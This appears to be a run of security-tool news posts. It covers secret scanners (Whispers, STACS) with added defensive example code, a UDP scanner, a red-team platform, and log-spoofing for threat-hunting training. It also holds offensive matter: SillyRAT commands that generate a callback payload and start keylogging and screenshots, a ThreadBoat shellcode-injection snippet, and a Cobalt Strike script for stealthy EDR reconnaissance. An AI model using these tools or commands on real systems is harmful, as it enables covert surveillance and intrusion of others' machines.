Rules specify the actual things that should be pulled out from key-value pairs. There are several common ones that come built-in, such as AWS keys and passwords, but the tool is made to be easily expandable with new rules.

  • Custom rules can be defined in the main config file under rules:
  • Custom rules can be added to whispers/rules
rule-id:  # unique rule name
  description: Values formatted like AWS Session Token
  message: AWS Session Token # report will show this message
  severity: BLOCKER # one of BLOCKER, CRITICAL, MAJOR, MINOR, INFO

  key: # specify key format
    regex: (aws.?session.?token)?
    ignorecase: True # case-insensitive matching

  value: # specify value format
    regex: ^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9\+\/]{270,450}$
    ignorecase: False # case-sensitive matching
    minlen: 270 # value is at least this long
    isBase64: True # value is base64-encoded
    isAscii: False # value is binary data when decoded
    isUri: False # value is not formatted like a URI

  similar: 0.35 # maximum allowed similarity between key and value
                # (1.0 being exactly the same)

Plugins

All parsing functionality is implemented via plugins. Each plugin implements a class with the pairs() method that runs through files and returns the key-value pairs to be checked with rules.

class PluginName:
    def pairs(self, file):
        yield "key", "value"
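The rule format shown under Config and Custom Rules and the plugin interface above can be seen working together in the following added example, which is not Whispers' own code. It defines a small plugin whose pairs() method extracts key-value pairs from .properties-style text, and a rule evaluator that applies the fields used in the page's rule examples (regex, ignorecase, minlen, isBase64 and the similar threshold) to each pair. The evaluator's semantics are my reading of the documented fields, not Whispers' implementation, and the isAscii and isUri fields are left out. The input text and the token value are constructed for the demonstration.

```python
import base64
import difflib
import re
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed sample input; the token is generated here and is not a real credential.
_FAKE_TOKEN = base64.b64encode(bytes(range(204))).decode()  # 272 base64 chars
SAMPLE_PROPERTIES = f"""\
# constructed sample .properties file
db.user = app
db.password = Wint3r1sC0ming!
maintainer = ned stark
aws_session_token = {_FAKE_TOKEN}
"""


class PropertiesPlugin:
    """Plugin in the shape the page describes: pairs() yields (key, value) for
    every "key = value" or "key: value" line, skipping comments and blanks."""

    _line = re.compile(r"^\s*([^#=:\s][^=:]*?)\s*[=:]\s*(.*?)\s*$")

    def pairs(self, text: str) -> Iterator[Tuple[str, str]]:
        for raw in text.splitlines():
            m = self._line.match(raw)
            if m:
                yield m.group(1), m.group(2)


# Rules in the shape of the page's config.yml examples (semantics are assumed).
RULES: Dict[str, dict] = {
    "password": {
        "message": "Password", "severity": "BLOCKER",
        "key": {"regex": r"pass(word|wd)?", "ignorecase": True},
        "value": {"regex": r".{8,}"},
        "similar": 0.35,
    },
    "starks": {
        "message": "Whispers from the North", "severity": "CRITICAL",
        "value": {"regex": r"(Aria|Ned) Stark", "ignorecase": True},
    },
    "aws-session-token": {
        "message": "AWS Session Token", "severity": "BLOCKER",
        "key": {"regex": r"(aws.?session.?token)?", "ignorecase": True},
        "value": {"regex": r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9\+\/]{270,450}$",
                  "minlen": 270, "isBase64": True},
        "similar": 0.35,
    },
}


def is_base64(value: str) -> bool:
    try:
        base64.b64decode(value, validate=True)  # rejects non-alphabet characters
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def similarity(key: str, value: str) -> float:
    """Ratio in 0.0..1.0; the 'similar' field rejects pairs like password=password."""
    return difflib.SequenceMatcher(None, key.lower(), value.lower()).ratio()


def _spec_matches(spec: Optional[dict], text: str) -> bool:
    if spec is None:
        return True
    flags = re.IGNORECASE if spec.get("ignorecase") else 0
    if "regex" in spec and not re.search(spec["regex"], text, flags):
        return False
    if "minlen" in spec and len(text) < spec["minlen"]:
        return False
    if "isBase64" in spec and is_base64(text) != spec["isBase64"]:
        return False
    return True


def apply_rule(rule_id: str, rule: dict, key: str, value: str) -> Optional[dict]:
    """Return a finding dict when the pair satisfies every part of the rule."""
    if not _spec_matches(rule.get("key"), key):
        return None
    if not _spec_matches(rule.get("value"), value):
        return None
    if "similar" in rule and similarity(key, value) > rule["similar"]:
        return None
    return {"rule": rule_id, "key": key, "value": value,
            "message": rule["message"], "severity": rule["severity"]}


def scan(text: str, rules: Dict[str, dict], plugin=None) -> List[dict]:
    plugin = plugin or PropertiesPlugin()
    findings = []
    for key, value in plugin.pairs(text):
        for rule_id, rule in rules.items():
            hit = apply_rule(rule_id, rule, key, value)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PROPERTIES, RULES):
        print(f"{f['severity']:8} {f['rule']:18} {f['key']} = {f['value'][:20]}...")
```

The similar threshold is what keeps placeholder assignments such as password=password out of the report; the aws-session-token key regex is optional as a whole (it ends in ?), so that rule is effectively decided by its value checks alone, exactly as in the page's example.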


UDP-Hunter - Network Assessment Tool For Various UDP Services Covering Both IPv4 And IPv6 Protocols

23 November 2021 at 11:30
By: Zion3R


UDP scanning has always been a slow and painful exercise, and if you add IPv6 on top of UDP, the tool choices get pretty limited. UDP Hunter is a Python-based open-source network assessment tool focused on UDP service scanning. With UDP Hunter, we have focused on providing auditing of widely known UDP protocols for IPv6 and IPv4 hosts. As of today, UDP Hunter supports 19 different service probes. The tool allows you to do bulk scanning of large networks as well as targeted host scanning for specific ports and more. Once an open service is discovered, UDP Hunter goes one step further and provides guidance on how the discovered service can possibly be exploited. UDP Hunter provides reports in a neat text format; support for more formats is under way.


How does UDP Hunter work?

UDP Hunter builds a list of IPs from any IP range given to it. It also accepts domain names, which are resolved and their IPs added to the list. Once the list has been built internally, UDP Hunter sends UDP probes to every listed IP; a host running a UDP service will respond. UDP Hunter sniffs the network specifically for UDP traffic and reads every UDP packet it receives, and all UDP responses received while it runs are reported. There is, however, an option (--noise=false) to ignore unrelated UDP packets and only record the UDP traffic of interest coming from the hosts and services/ports in the target list. The idea behind UDP Hunter was initially inspired by udp-proto-scanner. I heartily thank Portcullis Labs for it, and also Anant and Sumit Siddharth (Sid) for their valuable inputs while working on UDP Hunter.


Supported UDP Probes:

As of today, we support the following UDP service probes on their default ports:

  • ike - 500 port
  • rpc / RPCCheck - 111 port
  • ntp / NTPRequest - 123 port
  • snmp-public / SNMPv3GetRequest - 161 port
  • ms-sql / ms-sql-slam - 1434 port
  • netop - 6502 port
  • tftp - 69 port
  • db2 - 523 port
  • citrix - 1604 port
  • echo - 7 port
  • chargen - 19 port
  • systat - 11 port
  • daytime / time - 13 port
  • DNSStatusRequest / DNSVersionBindReq - 53 port
  • NBTStat - 137 port
  • xdmcp - 177 port
  • net-support - 5405 port
  • mdns-zeroconf - 5353 port
  • gtpv1 - 2123 port

Setup:

Download the tool from here or Clone the repository:

git clone https://github.com/NotSoSecure/udp-hunter


Requirements:
  • Python 3.x
  • Python Modules - also mentioned in the "requirements.txt" file
    • netaddr
    • colorama
    • argparse
    • ifaddr
    • datetime

This should help you with the initial setup:

Install all required modules: pip3 install -r requirements.txt


Configuration files required:
  • udp.txt - This file contains UDP probes
  • udphelp.txt - This file contains list of tools, suggestions for each UDP probes or services

You can also change configuration files by using command line argument:

"--configfile" and "--probehelp"


Verify the configurations by running following command:

python udp-hunter.py

Note: It should display the following help details; if this throws any error, check your configuration or contact me for any tool-specific errors.


Features / Options:

UDP Hunter v0.1beta has the following features:

Mandatory Options:
  • --host - Single Host - Required or
  • --file - File of ips - Required

Optional:
  • --output - Output file - Required
  • --probes - Name of probe or 'all' (default: all probes) (Optional)
    • Probe list - ike, rpc, ntp, snmp-public, ms-sql, ms-sql-slam, netop, tftp, db2, citrix, echo, chargen, systat, daytime, time, RPCCheck, DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, SNMPv3GetRequest, xdmcp, net-support, mdns-zeroconf, gtpv1
  • --ports - List of ports or 'all' (default: all ports) (Optional)
  • --retries - Number of packets to send to each host. Default 2 (Optional)
  • --noise - To filter output from non-listed IPs (Optional)
  • --verbose - verbosity; also shows sniffer output. Please keep this true (it is true by default), as it helps us analyse the output.
  • --timeout - Timeout 1.0, 2.0 in minutes (Optional)
  • --lhost6 - Provide the IPv6 address of the listener interface
  • --lhost4 - Provide the IPv4 address of the listener interface
  • --configfile - Configuration file location - default is 'udp.txt' in same directory
  • --probehelp - Help file location - default is 'udphelp.txt' in same directory

Usage:

Usage: python udp-hunter.py --file=inputfile.txt --output=outputfile.txt [optional arguments]

Usage: python udp-hunter.py --file=inputfile.txt --output=outputfile.txt [--probes=NTPRequest,SNMPv3GetRequest] [--ports=123,161,53] [--retries=3] [--noise=true] [--verbose=false] [--timeout=1.0] [--configfile]


Credits:

The UDP probes are mainly taken from amap, ike-scan, nmap and udp-proto-scanner. Inspiration for the scanning code was drawn from udp-proto-scanner.


Future Work:
  • Addition of more UDP probes
  • Different reporting formats
  • Update exploitation-related helps

Read More:


ThreatBox - A Standard And Controlled Linux Based Attack Platform

22 November 2021 at 20:30
By: Zion3R


ThreatBox is a standard and controlled Linux based attack platform. I've used a version of this for years. It started as a collection of scripts, lived as a rolling virtual machine, existed as code to build a Linux ISO, and has now been converted to a set of ansible playbooks. Why Ansible? Why not? This seemed to be the next natural evolution to the configuration of standard attack platforms.

This project uses ansible playbooks and roles to perform post deployment configuration on a linux target (Tested on Ubuntu 18.04).

The project is designed to be used as a starter process in creating, managing, and using a standard attack platform for red teaming or penetration testing.

Detail on the concept of a Standard Attack Platform can be found in the book Red Team Development and Operations - A practical guide, written by Joe Vest and James Tubberville.


Features
  • Standard tools defined as ansible roles
  • Customizations designed to make security testing easier
  • Variable list to add or remove git repositories, OS packages, or python modules. (threatbox.yml)
  • Version tracking of the deployed instance version and the deploy tool version. This is helpful in meeting compliance rules and can help minimize fear by actively tracking all tools.
    • Threatbox version created at deployment and displayed in desktop wallpaper
    • Deployed software tracked in ~/Desktop/readme
  • SSH port auto-switching. The deployment starts on port 22, but reconfigures the target system to the desired SSH port using the ansible_port variable in threatbox.yml
  • Download and compile several .net toolkits (i.e. SeatBelt.exe from Ghostpack https://github.com/GhostPack/Seatbelt)
  • Most python projects installed using pipenv. Use pipenv shell in the project directory to access. See https://realpython.com/pipenv-guide/ for pipenv usage guidance

Project Files

The following list highlights key components of this project.

| File/Directory | Description | Usage |
| --- | --- | --- |
| hosts | Ansible hosts file | Update with IP addresses of target ansible systems |
| group_vars/threatbox.yml | Common variables | Variables used for the project; update as needed |
| threatbox_playbook.yml | Primary ansible playbook | Update as needed to add additional roles or features |
| roles/common | Common OS platform configuration | Set up common OS settings (i.e. set version in background or build) |
| roles/. | Other specific roles to configure or deploy tools | Add or modify roles in roles/ |

Quickstart

Provision

Provision one or more targets.

Note: This project was tested on Ubuntu 18.04 deployed in Digitalocean


Configuration
  1. Copy hosts.sample to hosts
  2. Edit hosts with the IP(s) of your target systems
  3. Copy group_vars/threatbox.yml.sample to group_vars/threatbox.yml
  4. Edit group_vars/threatbox.yml with the updated variables you would like to use
    • Don't forget to update SSH key with a key that has access to the remote target

Ansible commands
# OSX issue https://github.com/ansible/ansible/issues/32499
if [[ "$(uname)" == "Darwin" ]]
then
export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=yes;
fi

# Ansible Logging
rm -f ./ansible.log  # -f so a missing log from a first run does not abort the script
export ANSIBLE_LOG_PATH="ansible.log"

# Ansible Debugging
export ANSIBLE_DEBUG=False

# Execute playbook
ansible-playbook -e ansible_python_interpreter=/usr/bin/python3 -i hosts threatbox_playbook.yml

Note: Consider using Mitogen for Ansible to gain a significant performance boost. https://mitogen.networkgenomics.com/ansible_detailed.html


Tested with this ansible.cfg
[defaults]
host_key_checking = False
pipelining = True
forks = 100
timeout = 600
stdout_callback = yaml
bin_ansible_callbacks = True
callback_whitelist = profile_roles, profile_tasks, timer

#mitogen
strategy_plugins = ~/Documents/mitogen-0.2.9/ansible_mitogen/plugins/strategy
strategy = mitogen_linear

Remotely Access the system

Console access with SSH

Note: SSH may be set to a non-standard port during setup. This value is set in the group_vars/threatbox.yml files

threatboxip=10.10.10.10
sshport=52222
ssh -p $sshport -i ~/.ssh/threatbox_id_rsa user@$threatboxip   # 'user' is a placeholder for the remote account

GUI Access with VNC over SSH

Note: VNC is set up but is not reachable over the network. You must use an SSH tunnel to access it.

threatboxip=10.10.10.10
sshport=52222
ssh -p $sshport -i ~/.ssh/threatbox_id_rsa -L 5901:localhost:5901 user@$threatboxip   # 'user' is a placeholder for the remote account

Notes on the project

This project uses Ansible roles. These roles may not exactly follow the Ansible style: they were designed to be used as part of this project and use a single 'variable' file to control the project. The roles can easily be used in other projects with minor tweaks.


Features
  • ThreatBox custom commands
  • Tool categories
  • Tracking of all installed tools
  • Automatic terminal logging
  • Custom terminal options provide more context
  • Light version of the terminal
  • Pipenv keeps Python projects independent
  • Example of SilentTrinity running in a pipenv environment



ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shell-code Into A Standard Win32 Application

22 November 2021 at 11:30
By: Zion3R


Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.


About

I developed this small project to continue my experiments with different code injection methods and to allow red team security professionals to use this method as a unique way to perform software penetration testing. With thread hijacking, the hijacker.exe program suspends a thread within the target.exe program, allowing shellcode to be written to that target thread and executed later (via WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()).


Example GIF (Credits To Endgame)



Usage
int main()
{
    System sys;
    Interceptor incp;
    Exception exp;

    sys.returnVersionState();
    if (sys.returnPrivilegeEscalationState())
    {
        std::cout << "Token Privileges Adjusted\n";
    }

    if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
    {
        incp.ExecuteWin32Shellcode(m_procId);
    }

    system("PAUSE");
    return 0;
}

For Further Information On Thread Execution Hijacking

Click On The Link Below

https://capec.mitre.org/data/definitions/30.html


Environment
  • Windows Vista+
  • Visual C++

Libs
  • Winapi
    • user32.dll
    • kernel32.dll
    • ntdll.dll


Ethical Notice

This code was simply written to demonstrate an overlooked method to inject shellcode or a DLL into a Win32 program. This code is not to be used for malicious purposes. The author, Josh Schiavone, is not liable for misuse of this software. May God bless you all.



Stacs - Static Token And Credential Scanner

21 November 2021 at 20:30
By: Zion3R


Static Token And Credential Scanner


What is it?

STACS is a YARA-powered static credential scanner which supports binary file formats, analysis of nested archives, composable rulesets and ignore lists, and SARIF reporting.


What does STACS support?

Currently, STACS supports recursive unpacking of tarballs, gzips, bzips, zips, and xz files. As STACS works on detected file types rather than on filenames, proprietary file formats based on these types are automatically supported (such as Docker images, Android APKs, and Java JAR files).


Who should use STACS?

STACS is designed for use by any teams who release binary artifacts. STACS provides developers the ability to automatically check for accidental inclusion of static credentials and key material in their releases.

However, this doesn't mean STACS can't help with SaaS applications, enterprise software, or even source code!

As an example, STACS can be used to find static credentials in Docker images uploaded to public and private container registries. It can also be used to find credentials accidentally compiled in to executables, packages for mobile devices, and "enterprise archives" - such as those used by Java application servers.


How does it work?

STACS detects static credentials using "rule packs" provided to STACS when run. These rule packs define a set of YARA rules to run against files provided to STACS. When a match against a rule is found, a "finding" is generated. These findings represent potential credentials inside of a file, and are reported on for a developer to remediate or "ignore".

If the finding is found to be a false positive - that is, a match on something other than a real credential - the developer can generate a set of "ignore lists" to ensure that these matches don't appear in future reports.

The real power from STACS comes from the automatic detection and unpacking of nested archives, and composable ignore lists and rule packs.


Ignore lists?

In order to allow flexible and collaborative usage, STACS supports composable ignore lists. This allows for an ignore list to include other ignore lists which enable composition of a "tree of ignores" based on organisational guidelines. These ignore lists are especially useful in organisations where many of the same frameworks or products are used. If a team has already marked a finding as a false positive, other teams get the benefit of not having to triage the same finding.


Rule packs?

In the same manner as ignore lists, rule packs are also composable. This enables an organisation to define a baseline set of rules for use by all teams, while still allowing teams to maintain rulesets specific to their products.
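The three sections above (rule packs, findings, composable ignore lists, and unpacking by detected file type) fit together as follows. The block below is an added illustration written for this page, not STACS's own code: plain regexes stand in for YARA rules, the nested release bundle and the ignore lists are constructed inline, and the rule and list names are made up for the example.

```python
"""Added example of the STACS approach: detect file types by content, unpack
nested archives recursively, match a rule pack against leaf files, and suppress
findings via composable ignore lists. Not STACS code; rules are regex stand-ins."""
import bz2, fnmatch, gzip, io, lzma, re, tarfile, zipfile

# Regex "rule pack" standing in for YARA rules (constructed patterns).
RULE_PACK = {
    "aws_access_key": re.compile(rb"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(rb"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

# Constructed ignore lists: a team list includes the org-wide baseline, and a
# triaged list adds one finding-level suppression (rule + path glob + line).
IGNORE_LISTS = {
    "org-baseline": {"ignore": [{"rule": "private_key", "path": "*/test/*"}]},
    "team": {"include": ["org-baseline"], "ignore": []},
    "team-triaged": {"include": ["team"],
                     "ignore": [{"rule": "aws_access_key", "path": "*config/app.env", "line": 2}]},
}

MAGIC = [(b"\x1f\x8b", "gzip"), (b"BZh", "bzip2"), (b"\xfd7zXZ\x00", "xz"), (b"PK\x03\x04", "zip")]
DECOMPRESS = {"gzip": gzip.decompress, "bzip2": bz2.decompress, "xz": lzma.decompress}


def detect_type(data):
    """Classify by magic bytes, never by filename (so a .apk or .jar is just a zip)."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if len(data) > 262 and data[257:262] == b"ustar":
        return "tar"
    return "file"


def compose_ignores(name, lists, seen=None):
    """Flatten a tree of ignore lists; 'include' pulls in other lists (cycle-safe)."""
    seen = set() if seen is None else seen
    if name in seen:
        return []
    seen.add(name)
    doc = lists[name]
    entries = list(doc.get("ignore", []))
    for inc in doc.get("include", []):
        entries += compose_ignores(inc, lists, seen)
    return entries


def is_ignored(rule, path, line, entries):
    return any(e["rule"] == rule and fnmatch.fnmatch(path, e["path"])
               and e.get("line") in (None, line) for e in entries)


def scan(data, path, ignores, findings, depth=0):
    """Recursively unpack and scan; the depth limit guards against nested-archive bombs."""
    if depth > 8:
        return findings
    kind = detect_type(data)
    if kind in DECOMPRESS:
        scan(DECOMPRESS[kind](data), f"{path}!{kind}", ignores, findings, depth + 1)
    elif kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                scan(zf.read(name), f"{path}!{name}", ignores, findings, depth + 1)
    elif kind == "tar":
        with tarfile.open(fileobj=io.BytesIO(data)) as tf:
            for m in tf.getmembers():
                if m.isfile():
                    scan(tf.extractfile(m).read(), f"{path}!{m.name}", ignores, findings, depth + 1)
    else:  # leaf file: apply every rule, record line number and suppression state
        for rule, pattern in RULE_PACK.items():
            for match in pattern.finditer(data):
                line = data.count(b"\n", 0, match.start()) + 1
                findings.append({"rule": rule, "path": path, "line": line,
                                 "suppressed": is_ignored(rule, path, line, ignores)})
    return findings


def build_sample_bundle():
    """Constructed input: zip -> tar.gz -> env file containing a fake AWS-style key."""
    files = {"config/app.env": b"DB_HOST=db.internal\nAWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE00\n",
             "README": b"nothing secret here\n"}
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tf:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, "w") as zf:
        zf.writestr("release/bundle.tar.gz", gzip.compress(tar_buf.getvalue()))
    return zip_buf.getvalue()


def run_scan(ignore_list="team"):
    return scan(build_sample_bundle(), "release.zip", compose_ignores(ignore_list, IGNORE_LISTS), [])


if __name__ == "__main__":
    for f in run_scan("team-triaged"):
        print(f)
```

Running it with the "team" list reports the key on line 2 of config/app.env, with the full unpack chain in the path; switching to "team-triaged" keeps the same finding but marks it suppressed, which mirrors how STACS carries ignored findings through into SARIF as suppressed rather than dropping them.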


How do I use it?

The easiest way to use STACS is using the Docker images published to Docker Hub. However, STACS can also be installed directly from Python's PyPI, or by cloning this repository. See the relevant sections below to get started!

A cloud based service is coming soon which allows integration directly in build and release pipelines to enable detection of static credentials before release!


Docker

Using the published images, STACS can scan artifacts right away. The STACS Docker image provides a number of volume mounts so that the files to be scanned can be mounted directly into the scan container.

As an example, to scan everything in the current folder, the following command can be run (Docker must be installed).

docker run \
--rm \
--mount type=bind,source=$(pwd),target=/mnt/stacs/input \
stacscan/stacs:latest

By default, STACS outputs any findings in SARIF format directly to STDOUT; to keep things orderly, all log messages are sent to STDERR. For more advanced use cases, a number of other volume mounts are provided, which let the user control the rule packs, ignore lists, and cache directory to use.


PyPI

STACS can also be installed directly from Python's PyPI. This provides a stacs command which can then be used by developers to scan projects directly in their local development environments.

STACS can be installed directly from PyPI using:

pip install stacs

Please note: the PyPI release of STACS does not come with any rules. These will also need to be cloned from the community rules repository for STACS to work!


FAQ

Is there a hosted version of STACS?

Not yet. However, there are plans for a hosted version of STACS which can be easily integrated into existing build systems, and which contains additional prebuilt rule packs and ignore lists.


What do I do about false positives?

Unfortunately, false positives are an inevitable side effect of detecting static credentials. If rules are too granular, rule maintenance becomes a burden and STACS may miss credentials. If rules are too coarse, STACS may generate too many false positives!

To help, STACS provides a number of tools for reducing the number of false positives which make it into final reports.

Primarily, STACS provides a mechanism which allows users to define composable ignore lists which allow a set of findings to be "ignored". These rules can be as coarse as ignoring all files based on a pattern, or as granular as a specific finding on a particular line of a file.

This information is automatically propagated through into reports, so "ignored" findings will be marked as "suppressed" in SARIF output while also including the reason for the ignore in the output for tracking.


How do I view the results?

Currently, the only output format is SARIF v2.1.0. There are a number of viewers available which make this data easier to read, such as this great web based viewer from Microsoft. An example of the findings from a Docker container image has been included below:



The performance is really, really bad when running in Docker on macOS!

Unfortunately, this appears to be due to a limitation of Docker Desktop for Mac. I/O for bind mounts is really, really slow.



SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT

21 November 2021 at 11:30
By: Zion3R


A Cross Platform multifunctional (Windows/Linux/Mac) RAT.


Getting Started

Description

A cross-platform RAT written in pure Python. The RAT accepts commands alongside arguments to act either as the server that accepts connections or as the client/target that establishes connections to the server. The generate command uses the pyinstaller module to compile the actual payload code, so in order to generate a payload file for your respective platform you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.


Features
  • Built-in Shell for command execution
  • Dumping system information including drives and RAM
  • Screenshot module. Captures screenshot of client screen.
  • Connection Loop (Will continue on connecting to server)
  • Currently, it uses BASE64 encoding.
  • Pure Python
  • Cross Platform. (Tested on Linux. Errors are accepted)
  • Source File included for testing
  • Python 3

To be expected in future
  • Stealth Execution
  • Encryption
  • Storing Sessions from last attempt
  • Pushing Notifications when a client connects

Installation

The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:

$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt

Documentation

Generating Payload

You can get the payload file in two ways:

  • Source File
  • Compiled File
The source file remains the same on all platforms, so you can generate it on one platform and use it on another. Getting the source file:

$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source

The compiled version has to be generated on the respective platform. For example, you can't generate an .exe file on Linux; you specifically have to be on Windows. The tool is still under testing, so all kinds of errors are to be expected. Make sure to open an issue though. Generating the compiled version for Linux:

$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer


Replace your IP Address and Port on above commands.


Running Server

The server must be executed on Linux. You can buy a VPS or cloud server for connections. For the record, the server doesn't store any sessions from the last run, so all progress will be lost once the server application is terminated. Running your server:

$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999

Connections

All the connections will be listed under sessions command:

$ sessions


You can connect to your target session with the connect command and launch one of the available commands:

$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot


Help

Get a list of available commands:

$ help

Help on a Specific Command:

$ help COMMAND

Support

Twitter: @hash3liZer
Discord: TheFlash2k#0407



Registry-Recon - Cobalt Strike Aggressor Script That Performs System/AV/EDR Recon

20 November 2021 at 20:30
By: Zion3R

Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon.

Author: Jess Hires


Description

As red-team practitioners, we often use tools that attempt to fingerprint details about a compromised system, preferably in the stealthiest way possible. Some of our usual tooling for this started getting flagged by EDR products due to the use of Windows CLI commands. This Aggressor script aims to solve that problem by probing the system using only native registry queries, with no CLI commands.


Setup

Simply load reg.cna into Cobalt Strike using the Script Manager. Then right-click on the beacon you want to run registry recon on, and choose Registry then Recon, or type regenum into the beacon console.





How does this work?

Primarily, using Cobalt Strike's breg_query and breg_queryv functions. Then, all beacon output is hijacked with beacon_output, looking for specific values. When a positive match is made, the output will be highlighted in the beacon output. Since there is no beacon_output_reg or something similar, like beacon_output_ls and beacon_output_ps, all output must be captured for parsing.


What if my AV/EDR product isn't detected? / How can I help?

This is expected. We couldn't test for every AV/EDR solution, and we knew that many would be missing. You can help us out by submitting a GitHub issue including the following info:

  • If this is a System/AV/EDR entry
  • The name of the product
  • Relevant registry entries that can be used to positively ID the product


pwnSpoof - Generates realistic spoofed log files for common web servers with customisable attack scenarios

20 November 2021 at 11:30
By: Zion3R


pwnSpoof (from Punk Security) generates realistic spoofed log files for common web servers with customisable attack scenarios.

Every log bundle is unique and completely customisable, making it perfect for generating CTF scenarios and for training serials.

Can you find the attacker session and build the incident picture?



About The Project

pwnSpoof was created on the back of a threat hunting training exercise Punk Security delivered for a customer. The training exercise was to use a log analytic tool such as Splunk (other log analysing tools are available) and IIS logs to find login brute-force attacks and command injections.

The idea behind the pwnSpoof application is to:

  • Provide a quick CTF style training environment
  • Create unique logs every run
  • Test threat hunting in IIS, Apache and NGINX logs

Once you have created a set of logs, the idea is to load them into Splunk and use various techniques to answer the following questions:

  • What was the attacker's IP address and user_agent?
  • Did the attacker authenticate and, if so, with what account?
  • What was the geo-location of the attacker?
  • When did the attack occur?
  • What kind of attack was it?
  • What happened during the attack?
  • What artifacts may remain on the server?
  • What steps can be taken to remediate?
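The first four questions in that list can be answered mechanically once the log lines are parsed. The block below is an added example written for this page, not pwnSpoof's own code: it parses the two log shapes pwnSpoof emits (NGINX/Apache combined format and IIS W3C extended format), then hunts for the brute-force pattern the tool simulates. The log lines, IP addresses, user agents and the /login URI are constructed for the example; the threshold of five failures is an arbitrary tuning knob.

```python
"""Added threat-hunting example over web server logs of the kinds pwnSpoof
generates (NGINX combined and IIS W3C). Not pwnSpoof code; sample lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# NGINX / Apache combined log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_combined(lines):
    """Yield normalised events from combined-format lines; unparseable lines are skipped."""
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        d = m.groupdict()
        yield {"ip": d["ip"], "time": datetime.strptime(d["time"], "%d/%b/%Y:%H:%M:%S %z"),
               "method": d["method"], "uri": d["uri"].split("?", 1)[0],
               "status": int(d["status"]), "ua": d["ua"]}


def parse_w3c(lines):
    """Yield events from IIS W3C extended logs; the '#Fields:' header names the columns."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        yield {"ip": rec["c-ip"],
               "time": datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S"),
               "method": rec["cs-method"], "uri": rec["cs-uri-stem"],
               "status": int(rec["sc-status"]), "ua": rec["cs(User-Agent)"]}


def hunt_bruteforce(events, login_uri="/login", threshold=5):
    """Flag source IPs with at least `threshold` failed POSTs to the login URI and
    report whether a 200/302 followed the failures, plus user agents and time range."""
    per_ip = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["uri"] == login_uri:
            per_ip[e["ip"]].append(e)
    hits = []
    for ip, attempts in per_ip.items():
        attempts.sort(key=lambda e: e["time"])
        failures = [e for e in attempts if e["status"] in (401, 403)]
        if len(failures) < threshold:
            continue
        last_fail = failures[-1]["time"]
        hits.append({
            "ip": ip,
            "user_agents": sorted({e["ua"] for e in attempts}),
            "failed_attempts": len(failures),
            "authenticated": any(e["status"] in (200, 302) and e["time"] > last_fail for e in attempts),
            "first_seen": attempts[0]["time"].isoformat(),
            "last_seen": attempts[-1]["time"].isoformat(),
        })
    return hits


# Constructed NGINX sample: one legitimate user with a single typo, one brute-force run.
NGINX_SAMPLE = [
    '198.51.100.23 - - [27/Jul/2021:09:58:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/Jul/2021:09:58:30 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/Jul/2021:09:58:45 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
] + [
    f'203.0.113.7 - - [27/Jul/2021:10:00:0{i} +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.68.0"'
    for i in range(6)
] + [
    '203.0.113.7 - - [27/Jul/2021:10:00:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/7.68.0"',
]

# Constructed IIS W3C sample: a brute force that never succeeds.
IIS_SAMPLE = [
    "#Software: Microsoft Internet Information Services 10.0",
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)",
] + [f"2021-07-27 11:00:{i:02d} 192.0.2.99 POST /login 401 python-requests/2.25.1" for i in range(7)]


def report():
    return {"nginx": hunt_bruteforce(parse_combined(NGINX_SAMPLE)),
            "iis": hunt_bruteforce(parse_w3c(IIS_SAMPLE))}


if __name__ == "__main__":
    for server, hits in report().items():
        print(server, hits)
```

Each hit carries the attacker IP, the user agents seen, the failure count, whether a success followed the failures, and the first/last timestamps, which is the incident picture the question list asks for. The legitimate user with one failed login stays below the threshold and is not reported; a real hunt would tune the threshold and the login URI to the emulated application.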

Getting Started

The following will explain how to get started with pwnSpoof


Prerequisites

